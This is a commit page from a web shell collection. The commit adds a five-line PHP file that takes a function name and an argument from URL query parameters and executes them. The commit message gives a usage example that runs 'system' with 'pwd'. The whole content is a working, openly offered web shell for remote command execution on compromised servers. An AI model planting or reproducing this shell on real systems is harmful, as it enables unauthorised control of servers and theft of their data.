1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create 2022-08-26-08.php

from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ
usage: http://example.com/shell.php?f=system&a=pwd
This commit is contained in:
tennc
2022-08-26 19:54:45 +08:00
committed by GitHub
parent 6aab7111e9
commit b37de05dbb

5
php/2022-08-26-08.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
$f = $_GET['f'];
$a = $_GET['a'];
$f($a)
?>